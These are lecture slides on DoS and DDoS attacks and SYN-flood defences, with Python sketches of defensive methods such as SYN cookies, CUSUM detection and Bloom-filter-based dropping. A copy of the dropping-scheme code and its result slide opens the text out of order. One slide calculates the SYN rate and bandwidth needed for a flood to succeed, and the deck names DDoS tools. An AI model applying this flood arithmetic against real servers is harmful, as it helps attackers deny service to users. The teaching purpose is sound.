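A minimal sketch of this decision logic is shown below. Ordinary sets and a dict stand in for the three (counting) Bloom filters purely to keep the control flow visible, and the BF3 counter is seeded so that the n-th SYN from a source passes with probability roughly 1/n, as described on the result slide that follows.

# Minimal sketch of the intentional-dropping decision logic (sets/dict used in
# place of the three Bloom filters for clarity only).
import random

bf1, bf2, bf3 = set(), set(), {}           # first SYNs, completed handshakes, others

def on_syn(t):
    if t in bf2:
        return True                        # case 3: source with a completed handshake
    if t in bf3:
        bf3[t] += 1                        # this is the n-th SYN from this source
        return random.random() < 1.0 / bf3[t]   # case 4: pass with probability 1/n
    if t in bf1:
        bf1.discard(t)
        bf3[t] = 2                         # case 2: second SYN -> promote to BF3, let through
        return True
    bf1.add(t)                             # case 1: very first SYN from this source
    return False                           # ... and it is dropped

def on_ack(t):
    if t in bf3:
        del bf3[t]
        bf2.add(t)                         # handshake completed: remember this source
        return True
    return t in bf2                        # otherwise only known-good sources pass

t = ("10.0.0.7", 40000, "10.0.0.1", 80)
print(on_syn(t), on_syn(t), on_ack(t))     # False True True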
Result
◼ The first SYN from any source will be dropped
◼ The second SYN from the same source will go through
◼ If this same source continues sending SYNs, the probability that the SYN numbered n is allowed to go through is 1/n
➔ Thus, the SYN flood caused by an attacking source will be mitigated.
Denial of Service Attacks and
Solutions

Van Nguyen – HUT


Hanoi – 2010
Agenda

DoS Attack: Basic Concepts

SYN Flood Attack

Attack Source Detection

Traceback Solutions

Sep 2009
2
Denial-Of-Service

◼ Flooding-based
◼ Send packets to victims to exhaust their
❑ Network resources
❑ System resources

◼ Traditional DoS
❑ A single attacker

◼ Distributed DoS (DDoS)
❑ Many attackers acting in concert
DDoS

◼ A typical DDoS attack consists of


❑ Stealing partial control of a large number of hosts
❑ Secretly manipulating them to send dummy packets to
jam a victim and/or its Internet connection

◼ This can be done in the following ways:


❑ Exploiting system design weaknesses
◼ e.g. ping of death
❑ Imposing computationally intensive tasks on the
victim
◼ e.g. encryption and decryption
❑ Flooding-based DDoS attacks.

4
Attacks Reported

◼ May/June, 1998
❑ First primitive DDoS tools developed in the
underground:
◼ Small networks, only mildly worse than coordinated point-
to-point DoS attacks.
◼ August 17, 1999
❑ Attack on the University of Minnesota reported to
UW network operations and security teams.
◼ February 2000
❑ Attack on Yahoo, eBay, Amazon.com and other
popular websites.
◼ At one point, more than 12,000 attacks were observed
during a three-week period.
Reference: http://staff.washington.edu/dittrich/misc/ddos/timeline.html

5
DDoS Attacks

◼ Do not necessarily rely on particular network


protocols or system design weaknesses

◼ A major threat because of:


❑ availability of a number of user-friendly attack
tools
❑ Lack of effective solutions to defend against them

◼ The attacks can be classified into


❑ Direct Attacks
❑ Reflector Attacks.

6
Direct Attacks

◼ A large number of packets sent directly towards


a victim.

◼ Source addresses are usually spoofed


❑ the response goes elsewhere (or nowhere)

◼ Examples:
❑ TCP SYN flooding: the last message of TCP's 3-way
handshake never arrives from the source.
❑ Congesting a victim using ICMP messages, RST packets
or UDP packets.
❑ Attack packets observed: TCP packets (94%), UDP
packets (2%) and ICMP packets (2%).

7
Direct Attack

[Figure: direct attack architecture]

Agent Programs: Trinoo, Tribe Flood Network 2000, and Stacheldraht

8
Reflector Attacks

◼ Uses innocent intermediary nodes (routers and servers)


known as reflectors.

◼ An attacker sends packets that require responses to the


reflectors, with the packets' inscribed source address set (spoofed)
to the victim's address.

◼ Can be done using TCP, UDP, ICMP as well as RST packets.

◼ Examples:
❑ Smurf Attacks: Attacker sends ICMP echo request to a
subnet directed broadcast address with the victim’s address
as the source address.
❑ SYN-ACK flooding: Reflectors respond with SYN-ACK
packets to victim’s address.

9
Reflector Attack

[Figure: reflector attack architecture]

◼ Cannot be observed by backscatter analysis, because victims do


not send back any packets.
◼ Packets cannot be filtered as they are legitimate packets.

10
DDoS Attack Architectures

11
Some Reflector Attack Methods

12
Solutions to the DDoS Problems

◼ There are three lines of defense against the


attack:
❑ Attack Prevention and Preemption (before the
attack)
❑ Attack Detection and Filtering (during the
attack)
❑ Attack Source Traceback and Identification
(during and after the attack)

◼ A comprehensive solution should include all


three lines of defense.
13
Attack Prevention and Preemption

◼ Protect hosts from master and agent implants:


❑ Using signatures and scanning procedures to detect
them.
❑ Monitor network traffic for known attack messages
sent between attackers and masters.

◼ Using cyber-spies to intercept attack plans (e.g.,


a group of cooperating agents).

◼ These measures alone are inadequate, anyway.

14
Attack Source Traceback and Identification

◼ This is an after-the-fact measure

◼ IP Traceback: identifying the actual source of a

packet without relying on the (spoofable) source address.
❑ Deploy routers to help: they can record information
about the packets they have seen.
◼ Routers can send additional information about seen packets to
their destinations.
◼ Sometimes infeasible to use IP Traceback:
❑ Cannot always trace packets’ origins. (NATs and
Firewalls!)
❑ Ineffective in reflector attacks.
❑ But helpful for post-attack law enforcement.

15
Attack Detection and Filtering

◼ Deployed in two phases:


❑ Attack Detection: identifying DDoS attack packets.
❑ Packet Filtering: classifying and dropping those packets .

◼ Effectiveness of Detection
❑ FPR (False Positive Ratio):
No. of false positives/Total number of confirmed normal
packets
❑ FNR (False Negative Ratio):
No. of false negatives/Total number of confirmed attack
packets

Both metrics should be low!

16
Attack Detection and Filtering

◼ Effectiveness of Filtering

❑ Effective attack detection DOES NOT IMPLY


Effective packet filtering
◼ The detection phase uses victim identities (address or port no.), so
even normal packets with the same signature can be dropped.

❑ NPSR (Normal Packet Survival Ratio):


Percentage of normal packets that can survive in
the midst of an attack ➔ NPSR should be high!

17
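To make the three metrics concrete, here is a minimal sketch (the function name and the example counts are illustrative, not from the slides) of how they would be computed from packet counts:

def detection_metrics(false_pos, normal_total, false_neg, attack_total, normal_survived):
    # FPR: normal packets wrongly flagged / all confirmed normal packets
    fpr = false_pos / normal_total
    # FNR: attack packets missed / all confirmed attack packets
    fnr = false_neg / attack_total
    # NPSR: normal packets delivered during the attack / all normal packets
    npsr = normal_survived / normal_total
    return fpr, fnr, npsr

# e.g. 120 of 10,000 normal packets misclassified, 300 of 50,000 attack
# packets missed, 9,700 normal packets delivered:
print(detection_metrics(120, 10_000, 300, 50_000, 9_700))   # (0.012, 0.006, 0.97)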
Attack Detection and Filtering

18
Attack Detection and Filtering
◼ At Source Networks:
❑ One can filter packets based on address spoofing
❑ Direct attacks can be traced easily; reflector attacks are much harder
❑ Ensure all ISPs perform ingress packet filtering
◼ Filter spoofed packets whose source IPs do not belong to the
source network
◼ Very difficult to deploy this at all ISPs (impossible?)

◼ At the Victim’s Network:


❑ Victim can detect attack based on volume of incoming traffic or
degraded performance
◼ Commercial solutions available.
❑ Other mechanisms: IP Hopping
❑ Last resort: if the incoming link is jammed, the victim has to shut down
and ask the upstream ISP to filter the packets.

19
Attack Detection and Filtering

◼ At a Victim’s Upstream ISP Network:


❑ Filter packets as asked by victim
❑ Can be automated by carefully designed intrusion alert systems
❑ Not a really good idea though
◼ Normal packets can still be dropped
◼ This upstream ISP network can still be jammed under large-scale attacks.

◼ At further Upstream ISP Networks:


❑ The above approach can be further extended to other
upstream networks.
❑ Effective only if ISP networks are willing to co-operate and
install packet filters.

20
An Internet Firewall

◼ A bipolar (source-end/victim-end only) defense scheme cannot achieve both


effective attack detection and effective packet filtering.
➔ deploy a global defense infrastructure.
The plan is to detect attacks right at the Internet
core!

◼ Two methods, which employ a set of distributed


nodes in the Internet to perform attack detection
and packet filtering.
❑ Route-based Packet Filtering Approach (RPF)
❑ Distributed Attack Detection Approach (DAD)

21
Route-Based Packet Filtering (RPF)
◼ Extends the idea of ingress packet filtering
❑ Using distributed packet filters to examine the
packets, based on addresses and BGP routing
information.
◼ A packet is considered an attack packet if it comes from an
unexpected link.

◼ Major Drawbacks
❑ BGP messages must carry the needed source addresses
➔ overhead!
❑ Deployment is extremely demanding
◼ It was once estimated that filters would need to be placed in 1,800 out of 10,000 ASs
◼ and the # of ASs is continuously increasing.
❑ Can’t work against reflected packets.
22
Distributed Attack Detection (DAD)
◼ The idea is to deploy multiple Distributed Detection
Systems (DSs) to observe network anomalies and
misuses.
❑ Anomaly detection: identifying traffic patterns that
significantly deviate from normal
◼ e.g., unusual traffic intensity for specific packet types.
❑ Misuse detection: identifying traffic that matches a known
attack signature.
◼ DSs exchange attack information from their local
observations
❑ Stateful with respect to the DDoS attacks.
◼ It is still challenging to design an effective and
deployable architecture

23
Distributed Attack Detection

DS Design Considerations

Two hypotheses:
• H1 – presence of a DDoS attack
• H0 – the null hypothesis (no attack)
• Each attack alert includes a 'confidence level'

Other considerations:
• Filters should be installed only on attack
interfaces in the 'CONFIRMED' state
• All DSs should be connected 'always'
• Works in progress:
Intrusion Detection Exchange Protocol
Intrusion Detection Message Exchange Format

24
SYN FLOOD DEFENSE
SOLUTIONS

25
TCP SYN-Flooding Attack

◼ TCP services are often susceptible to various types of


DoS attacks
❑ SYN flood: external hosts attempt to overwhelm the server
machine by sending a constant stream of TCP connection
requests
◼ Streaming spoofed TCP SYNs
◼ Forcing the server to allocate resources for each new connection until all
resources are exhausted
❑ 90% of DoS attacks use TCP SYN floods
❑ Takes advantage of the three-way handshake
◼ The server starts "half-open" connections
◼ These build up… until the queue is full and all additional requests are blocked
TCP: Overview RFCs: 793, 1122, 1323, 2018, 2581

◼ point-to-point:
❑ one sender, one receiver
◼ reliable, in-order byte stream:
❑ no "message boundaries"
◼ pipelined:
❑ TCP congestion and flow control set window size
◼ send & receive buffers
◼ full duplex data:
❑ bi-directional data flow in same connection
❑ MSS: maximum segment size
◼ connection-oriented:
❑ handshaking (exchange of control msgs) init's sender, receiver state before data exchange
◼ flow controlled:
❑ sender will not overwhelm receiver

[Figure: the sending application writes data through its socket door into the TCP send buffer; TCP carries it in segments to the receiver's TCP receive buffer, from which the receiving application reads data]
TCP segment structure
[Figure: 32-bit TCP header layout — source port #, dest port #, sequence number, acknowledgement number, head len / not used, flag bits (URG, ACK, PSH, RST, SYN, FIN), receive window, checksum, urgent data pointer, options (variable length), application data (variable length)]
• sequence and acknowledgement numbers count by bytes of data (not segments!)
• URG: urgent data (generally not used); ACK: ACK # valid; PSH: push data now (generally not used); RST, SYN, FIN: connection establishment (setup, teardown commands)
• receive window: # bytes the receiver is willing to accept
• Internet checksum (as in UDP)
Attack Mechanism

◼ Upon receiving a SYN segment, a
Transmission Control Block
(TCB) is reserved
◼ TCP SYN-RECEIVED state: the
connection is half-open
❑ It is not transited to ESTABLISHED
until the last ACK of the handshake arrives
Attack Mechanism

◼ The attacker sends a flood of SYNs ➔ too many TCBs ➔ the host's
memory is exhausted.
◼ To avoid this, the OS only allows a fixed maximum number of TCBs
in the SYN-RECEIVED state
◼ If this threshold is reached, newly arriving SYNs will be rejected
TCP Connection Management
Recall: TCP sender and receiver
establish a "connection" before
exchanging data segments
◼ initialize TCP variables:
❑ seq. #s
❑ buffers, flow control info (e.g. RcvWindow)
◼ client: connection initiator
◼ server: contacted by client

Three-way handshake:
Step 1: client host sends TCP SYN segment to server
❑ specifies initial seq #
❑ no data
Step 2: server host receives SYN, replies with SYNACK segment
❑ server allocates buffers
❑ specifies server initial seq. #
Step 3: client receives SYNACK, replies with ACK segment,
which may contain data
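As a small illustration (the loopback host and port number are arbitrary choices, not part of the slides), the handshake is performed entirely by the kernel inside the standard socket calls; a Python sketch:

import socket
import threading

# The kernel sends/receives SYN, SYN-ACK and ACK inside listen()/accept()
# and connect(); the application never sees the handshake segments.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("127.0.0.1", 9090))
srv.listen(5)                       # backlog of pending (half-open) connections

def accept_one():
    conn, addr = srv.accept()       # returns once a 3-way handshake completes
    print("server: ESTABLISHED with", addr)
    conn.close()

t = threading.Thread(target=accept_one)
t.start()

cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cli.connect(("127.0.0.1", 9090))    # sends SYN, waits for SYN-ACK, sends ACK
print("client: ESTABLISHED from port", cli.getsockname()[1])
cli.close()
t.join()
srv.close()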
SYN Flooding

[Figure: client C sends a stream of SYNs (SYN_C1 … SYN_C5) to server S; S is listening and stores state for each half-open connection]
Implementation Method
How to create a successful flood
◼ Forcing drops of incomplete connections (ICs)
❑ Standard TCP: a half-open connection times out only after several retransmissions ➔ about 511 sec
❑ Assuming 1024 ICs are allowed per socket ➔ about 2 connection attempts per second suffice
to keep all allocated resources exhausted.
❑ Note that an existing IC is dropped when a new SYN request is received and the queue is full.
◼ If an ACK arrives at the server but finds no corresponding
IC state ➔ the server fails to establish the requested connection
❑ Round-trip time (RTT): the time required for the server to get the client's reply
❑ Forcing the server to drop IC state at a rate faster than one RTT ➔ no
connections are able to complete ➔ the attack succeeds!
◼ The goal of the attack is therefore to recycle every connection within less than the average
RTT (see the check below)
❑ For a listen queue size of 1024 and a 100-millisecond RTT ➔ about 10,000 packets
per second are needed.
❑ A minimal-size TCP packet is 64 bytes, so the total bandwidth used is only
about 5 Mb/second ➔ practical!

Sep 2010 Network Security by Van K Nguyen


34
Hanoi University of Technology
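A quick back-of-the-envelope check of the figures above (the queue size, timeout and RTT are the assumed values from the slide):

listen_queue = 1024      # incomplete connections allowed per socket
timeout_s    = 511       # seconds before a half-open connection times out
rtt_s        = 0.100     # assumed average round-trip time
pkt_bytes    = 64        # minimal TCP packet size

print(listen_queue / timeout_s)           # ~2 SYN/s keeps the queue full
syn_rate = listen_queue / rtt_s           # recycle the whole queue within one RTT
print(syn_rate)                           # ~10,240 SYN/s (the "10,000" above)
print(syn_rate * pkt_bytes * 8 / 1e6)     # ~5.2 Mb/s of attack bandwidth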
Firewall based Defense

◼ Examples: SYN Defender, SYN proxying


◼ Filters packets and connection requests before they reach the protected servers
◼ Maintains state for each connection

◼ Drawbacks: can be overloaded, extra delay


for processing each packet
Server Based Defense
◼ Examples: SYN cache, SYN cookies
◼ SYN cache:
❑ a hash table that partially stores connection state
❑ if the SYN-ACK is acked, the connection is then
established with the server
◼ SYN cookies
❑ store no state on the server; the state travels in the network
◼ a cryptographic function encodes the needed information into a
value that is sent to the client inside the SYN-ACK (as the initial sequence number)
◼ upon receiving the ACK, this value can be extracted and used as
proof that the source machine is genuine
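A minimal sketch of the SYN-cookie idea. This is not the exact layout real TCP stacks use (they pack a timestamp, an MSS index and a truncated MAC into the 32-bit initial sequence number); the SECRET, field layout and time-slot width here are illustrative, but the stateless encode/verify principle is the same:

import hashlib
import hmac
import os
import time

SECRET = os.urandom(16)                     # server-side key, never sent out

def syn_cookie(src_ip, src_port, dst_ip, dst_port, client_isn):
    # Encode the connection into a 32-bit value used as the server's ISN.
    t = int(time.time()) >> 6               # coarse 64-second time slot
    msg = f"{src_ip}:{src_port}-{dst_ip}:{dst_port}-{client_isn}-{t}".encode()
    mac = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(mac[:4], "big")

def verify_ack(src_ip, src_port, dst_ip, dst_port, client_isn, ack_num):
    # The final ACK must acknowledge cookie+1; recompute for recent slots.
    t_now = int(time.time()) >> 6
    for t in (t_now, t_now - 1):
        msg = f"{src_ip}:{src_port}-{dst_ip}:{dst_port}-{client_isn}-{t}".encode()
        mac = hmac.new(SECRET, msg, hashlib.sha256).digest()
        if ack_num == (int.from_bytes(mac[:4], "big") + 1) % 2**32:
            return True                     # client really received the SYN-ACK
    return False

isn = syn_cookie("192.0.2.1", 5555, "198.51.100.7", 80, 1000)
print(verify_ack("192.0.2.1", 5555, "198.51.100.7", 80, 1000, (isn + 1) % 2**32))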
SYN kill

◼ Monitors the network


❑ If it detects SYNs that are not being acked ➔ it
automatically generates RST packets to free the
half-open resources
◼ it also classifies addresses as likely to be spoofed or
legitimate…
Problems with previous solutions

◼ Solutions such as SYN cookies, SYN cache,


SYN Defender/SYN proxying, SYN kill
❑ Know nothing about the attack source
❑ Rely on costly IP traceback to find it
❑ These solutions are stateful, so they can themselves be
overwhelmed by SYN attacks
◼ around 14,000 SYN/sec can overload them
Flood Detection System (FDS)

◼ Stateless and simple, deployed at edge (leaf) routers


◼ Utilizes SYN–FIN pair behavior
◼ Can also use (SYN/ACK – FIN) pairs, so it works at either the client or the server side
◼ However, RST packets violate the SYN–FIN behavior
◼ Placement: first/last-mile leaf routers
❑ First mile – detects a large DoS attacker
❑ Last mile – detects DDoS attacks that the first mile
would miss
SYN – FIN Behavior
SYN – FIN Behavior

◼ Generally every SYN has a FIN


What to do about “RST”
◼ We can’t tell if RST is active or passive
◼ Consider 75% active
◼ Active represents a SYN passive does not
◼ Should balance out to be background noise

[Figure: packet trace — red: SYN, blue: FIN, black: RST]
Statistical Attack Detection

◼ Very many SYNs are necessary to
accomplish a DoS attack
◼ At least 500 SYN/sec
◼ around 14,000 SYN/sec can overwhelm a firewall-based defense
◼ roughly 300,000 SYNs (500/sec × 600 s) are necessary to shut down a server
for 10 minutes
◼ So the SYN–FIN ratio should be very skewed
during an attack
False Positive Possibilities

◼ Many new online users with long sessions


❑ More SYNs coming in than FINs
◼ A major server is down, which would result
in about 3 SYNs per FIN
❑ Because clients retransmit the SYN
CUSUM Algorithm

◼ Track the average number of FINs over a
time window and test the (SYN − FIN) difference
for statistical homogeneity.
If a significant change appears, locate the
point in time at which it occurred.
Detection

◼ The detection statistic stays at zero for all
normal activity and cumulatively tracks the excess
of SYNs over FINs once an attack starts
(CUSUM = "cumulative sum")
Detection
◼ The Internet can be quite dynamic and too
complicated for parametric estimation, so
a non-parametric sequential test is used, which requires much
less computation
◼ Two aspects of detection:
❑ 1) False alarm time: the time between successive
false alarms when no attack is present
❑ 2) Detection time: the detection delay after the
attack starts.

◼ The goal is to minimize the second and

maximize the first; however, these goals conflict and
require trade-offs
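A minimal sketch of such a non-parametric CUSUM detector (the drift and threshold values below are illustrative, not the tuning used in the original work):

def cusum_detect(diffs, drift=0.35, threshold=3.0):
    # diffs: normalized (SYN - FIN) differences per observation interval,
    #        e.g. (syn_count - fin_count) / smoothed_fin_count.
    # drift: constant subtracted each step so the statistic has a negative
    #        mean under normal traffic and therefore stays near zero.
    y = 0.0
    for i, x in enumerate(diffs):
        y = max(0.0, y + x - drift)        # resets to 0 for normal traffic
        if y > threshold:                  # grows quickly once SYNs outpace FINs
            return i                       # index of the detected change point
    return None                            # no attack detected

normal = [0.1, -0.2, 0.15, 0.0, -0.1]      # SYN roughly matches FIN
attack = [2.0, 2.5, 3.1, 2.8]              # flood: SYNs far exceed FINs
print(cusum_detect(normal + attack))       # alarms shortly after the flood begins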
Performance Trends SYN-FIN
Detecting SYN-Flood
using Bloom Filters

SFD-BF
Idea

◼ Improving SFD: use a Bloom filter to match FINs


against SYNs with low error probability
❑ For each TCP packet we are interested in its 4-tuple:
(source and destination IP, source and destination port) ➔
match each FIN against the SYNs on this 4-tuple
Hash Function

• Input : x
• Output : H[x]
• Properties
– Each value of x maps to a value of H[x]
– Typically: Size of (x) >> Size of (H[x])
• Implementation
– XOR of bits, shifting, rotates, ...

Bloom-Filter (BF)

◼ Bloom Filter uses k hash functions

Bloom-Filter (BF)

Querying a Bloom Filter

Querying a Bloom Filter

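A minimal Bloom-filter sketch (deriving the k positions from slices of one SHA-256 digest is just one convenient choice, not prescribed by the slides; it supports k ≤ 8 here):

import hashlib

class BloomFilter:
    def __init__(self, m, k):
        self.m, self.k = m, k
        self.bits = bytearray(m)            # one byte per bit, for simplicity

    def _positions(self, item):
        # k positions derived from one SHA-256 digest (4 bytes per position)
        digest = hashlib.sha256(item.encode()).digest()
        for i in range(self.k):
            yield int.from_bytes(digest[4 * i:4 * i + 4], "big") % self.m

    def insert(self, item):
        for p in self._positions(item):
            self.bits[p] = 1

    def query(self, item):
        # True  -> "possibly in the set" (false positives are possible)
        # False -> "definitely not in the set"
        return all(self.bits[p] for p in self._positions(item))

bf = BloomFilter(m=1024, k=7)
bf.insert("192.0.2.1:1234->198.51.100.7:80")
print(bf.query("192.0.2.1:1234->198.51.100.7:80"))    # True
print(bf.query("203.0.113.9:5555->198.51.100.7:80"))  # almost surely False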
Optimal Parameters of a Bloom filter

• n : the number of items to be stored
• k : the number of hash functions
• m : the size of the bit array
(memory)
• The false positive probability is
f ≈ (1 − e^(−kn/m))^k
• The optimal number of hash
functions k is:
k = ln2 × m/n ≈ 0.693 × m/n
• At this optimal k, f ≈ (½)^k ≈ (0.6185)^(m/n)
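A small helper (names are illustrative) that picks the optimal k for given n and m and evaluates the resulting false positive probability:

import math

def bloom_parameters(n, m):
    # optimal number of hash functions: k = ln2 * m/n
    k = max(1, round(math.log(2) * m / n))
    # general false positive probability: f = (1 - e^(-kn/m))^k
    f = (1.0 - math.exp(-k * n / m)) ** k
    return k, f

k, f = bloom_parameters(n=1000, m=16 * 1000)   # 16 bits per stored item
print(k, f)                                    # 11, ~0.00046 (cf. 0.000459 below)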

Counting Bloom Filters

◼ Extension: the array of m bits becomes an array of

m small counters.
❑ When inserting or deleting a value x, we simply increment
or decrement the corresponding counters

Counting Bloom Filters

❑ For a small false positive probability, usually set

m/n = 16 ➔ the false positive probability is at most 0.000459
❑ Counters of 8 bits are also used.
❑ When the number of counters in use reaches
m/2 ➔ reset the BF to keep the false positive probability small

SFD-Method

1. Classify the packets
2. Count the number of SYN and FIN packets
going through
3. Use the CUSUM algorithm to analyze the (SYN–FIN)
pair behaviour

SFD-BF Method

◼ Improvement on the previous SFD:


❑ Compute the difference between #SYN and #FIN

with the packets matched on their 4-tuple:


◼ When a SYN packet arrives, determine the
corresponding 4-tuple and insert it into the BF,
incrementing the counters specified by this 4-tuple.
◼ When a FIN/RST packet arrives, determine its
4-tuple and hash it into the BF to decrement the
corresponding counters
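A sketch of this per-4-tuple matching with a counting Bloom filter (structure and parameter choices are illustrative, not the exact implementation behind the results):

import hashlib

class CountingBloomFilter:
    def __init__(self, m, k):
        self.m, self.k = m, k
        self.counters = [0] * m

    def _positions(self, key):
        digest = hashlib.sha256(key.encode()).digest()
        for i in range(self.k):
            yield int.from_bytes(digest[4 * i:4 * i + 4], "big") % self.m

    def increment(self, key):                 # SYN seen for this 4-tuple
        for p in self._positions(key):
            self.counters[p] += 1

    def decrement(self, key):                 # matching FIN/RST seen
        for p in self._positions(key):
            if self.counters[p] > 0:
                self.counters[p] -= 1

def four_tuple(src_ip, src_port, dst_ip, dst_port):
    return f"{src_ip}:{src_port}->{dst_ip}:{dst_port}"

cbf = CountingBloomFilter(m=4096, k=7)
cbf.increment(four_tuple("192.0.2.1", 1234, "198.51.100.7", 80))   # SYN arrives
cbf.decrement(four_tuple("192.0.2.1", 1234, "198.51.100.7", 80))   # its FIN arrives
# Unmatched SYNs leave residual counts, which feed the CUSUM statistic above.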
Result
Result
Intentional Dropping Scheme
for SYN Flooding Mitigation
Idea

❑ Normally, if a client machine does not receive a SYN-ACK


within a certain time after sending a SYN, it
resends the SYN until it gets
connected to the wanted server.
❑ The idea of this method is to drop the first
SYN from every source machine, which helps
reduce SYN floods, since these usually consist of first SYNs
with spoofed addresses that are never retransmitted
Method

◼ The solution proposes using 3 different BFs:


❑ BF-1: stores the 4-tuple of the first SYN

coming from a given source


❑ BF-2: stores the 4-tuples of all SYNs for which
the 3-way handshake has already completed
❑ BF-3: stores the 4-tuples of all other SYNs.

Method

Once a SYN arrives, its 4-tuple address is checked


against the 3 BFs, and one of the following cases occurs:
◼ 1. Not in any BF ➔ this is the first SYN, so it is
dropped, and its 4-tuple is inserted into BF-1
◼ 2. If found in BF-1 ➔ this is a second SYN; we
just move the 4-tuple from BF-1 to BF-3
◼ 3. If in BF-2 ➔ let it go through.

◼ 4. If in BF-3 ➔ let it go through with


probability p = 1/n, where n is the value of the
corresponding counter in BF-3
Method

When an ACK arrives, its 4-tuple address is checked


against the BFs, which results in one of the 3 following
cases:
1. Not in any BF ➔ drop the packet
2. If it matches one in BF-2 ➔ let it through
3. If in BF-3 ➔ the handshake is completed ➔ move
the 4-tuple address from BF-3 to BF-2
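A compact sketch of this state machine. For clarity the three filters are modelled with exact Python sets/dicts keyed by the 4-tuple; the actual scheme uses Bloom filters (a counting filter for BF-3) to bound memory, and the counter initialization on promotion is my reading of the slides:

import random

bf1 = set()     # sources whose first SYN was dropped
bf2 = set()     # 4-tuples with a completed 3-way handshake
bf3 = {}        # other 4-tuples -> number of SYNs seen so far

def handle_syn(t):
    # Returns True if the SYN is forwarded, False if it is dropped.
    if t in bf2:
        return True                              # established source: pass
    if t in bf3:
        bf3[t] += 1
        return random.random() < 1.0 / bf3[t]    # nth SYN passes with prob 1/n
    if t in bf1:
        bf1.discard(t)                           # second SYN: promote BF-1 -> BF-3
        bf3[t] = 2
        return True
    bf1.add(t)                                   # very first SYN: remember, drop
    return False

def handle_ack(t):
    # Returns True if the ACK is forwarded, False if it is dropped.
    if t in bf2:
        return True
    if t in bf3:
        del bf3[t]                               # handshake done: BF-3 -> BF-2
        bf2.add(t)
        return True
    return False                                 # unknown 4-tuple: drop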
Result

◼ First SYN from any source will be dropped


◼ The second SYN from the same source will go
through
◼ If this same source continues sending SYNs, the
probability that the SYN numbered n is allowed
to go through is 1/n
➔ Thus, the SYN flood caused by an attacking
source will be mitigated.
